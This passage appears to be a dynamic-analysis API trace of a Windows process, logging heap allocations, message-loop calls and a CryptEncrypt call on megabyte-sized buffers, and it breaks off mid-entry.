WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0195.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.023] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0195.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0195.023] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0195.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0195.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0195.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0195.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0195.026] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0195.026] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0195.026] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0195.026] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0195.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0195.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0195.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0195.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0195.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0195.028] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0195.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0195.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0195.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0195.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0195.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0195.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0195.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1194020 [0195.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0195.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0195.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0195.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0195.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0195.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0195.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0195.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0195.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0195.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x12a5020 [0195.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13ba020 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0195.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x12a5020 | out: hHeap=0x970000) returned 1 [0195.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0195.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0195.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13ba020 | out: hHeap=0x970000) returned 1 [0195.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0195.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0195.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0195.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0195.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0195.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0195.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0195.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 